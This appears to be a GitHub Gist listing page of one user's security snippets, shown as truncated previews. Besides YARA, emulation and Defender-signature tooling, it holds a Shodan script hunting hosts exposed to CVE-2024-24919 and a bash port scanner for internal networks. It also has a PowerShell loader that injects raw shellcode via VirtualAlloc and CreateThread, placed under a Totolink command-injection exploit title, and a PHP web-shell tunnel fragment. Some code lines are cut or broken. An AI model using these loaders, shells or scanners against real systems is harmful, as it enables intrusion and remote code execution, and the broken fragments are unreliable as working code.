Skip to content

Instantly share code, notes, and snippets.

dmknght /
Created June 2, 2024 02:45
Scan for CheckPoint CVE-2024-24919 using Shodan
import os
import requests
from shodan import Shodan
API_KEY_PATH = os.path.expanduser("~/.config/shodan/api_key") # read API key from config file
KEYWORD = "country:cn http.status:200 \"Server: Check Point SVN foundation\""
URL_REQ = "/clients/MyCRL"
dmknght /
Last active December 11, 2023 22:53
A port scanner in bash. No netcat / nmap is required. Might be useful when discover open ports in internal network on a Linux server.
# Example of using bash with array
port_arr=(80 22 3306)
max_timeout=2 # Timeout requires coreutils (on Debian-based system)
function do_scan_port {
# If use array like above, use the line above
for port in "${port_arr[@]}"; do
# Otherwise, use the port range
dmknght / yr_find_creds.nim
Created November 19, 2023 04:34
Demo of using yara to find files that contains credentials. Requires Yara binding for Nim to compile.
import .. / src / engine / libyara # Binding lib co san. Neu tai ve thi sua cho nay, lay binding o day
import strformat
import os
# Pass vao compiler de link voi thu vien Yara
{.passL: "-lyara".}
errors: int
warnings: int
dmknght / WinDef_Extractor.cpp
Created October 30, 2023 23:05
Read, Extract, Merge extracted db of Windows Defender
Forked from
- Fixed some buffer overflow in sprintf
- Compile: g++ extract_sig.cpp -o extract_sig -Wall -lstdc++fs
- Usage: ./extract_sig <dir to write result> <extracted av/as base> <optional: extracted av/as dlta>
If both av and dlta is defined, the program will merge both of them to make a final db
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
dmknght /
Last active November 2, 2023 09:59
Use qiling to execute file (rootfs is required). Support showing ASM code and save Dump file
from qiling import *
from qiling.const import *
from unicorn.x86_const import UC_X86_INS_SYSCALL #
import argparse
import yara
def mem_scan(ql: Qiling, address: int, size: int, yr_pointer) -> None:
buf =, size)
for insn in ql.arch.disassembler.disasm(buf, address):
dmknght /
Last active October 26, 2023 00:05
Use format string bypass Totolink's Validity_check function, lead to remote OS command injection (CVE-2023-4746)
$rzJEzfsIm = @"
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
$ozmjNQUHYWcWLEB = Add-Type -memberDefinition $rzJEzfsIm -Name "Win32" -namespace Win32Functions -passthru
[Byte[]] $bwHCjeufl = 0xfc,0xe8,0x82,0x0,0x0,0x0,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0xc,0x8b,0x52,0x14,0x8b,0x72,0x28,0xf,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0xc1,0xcf,0xd,0x1,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x1,0xd1,0x51,0x8b,0x59,0x20,0x1,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x1,0xd6,0x31,0xff,0xac,0xc1,0xcf,0xd,0x1,0xc7,0x38,0xe0,0x75,0xf6,0x3,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x1,0xd3,0x66,0x8b,0xc,0x4b,0x8b,0x58,0x1c,0
ini_set("allow_url_fopen", true);
ini_set("allow_url_include", true);
ini_set('always_populate_raw_post_data', -1);
error_reporting(E_ERROR | E_PARSE);
function blv_decode($data) {
$data_len = strlen($data);
dmknght /
Last active August 27, 2023 08:09
Multiple OS command Injection in TOTOLink EX1200L firmware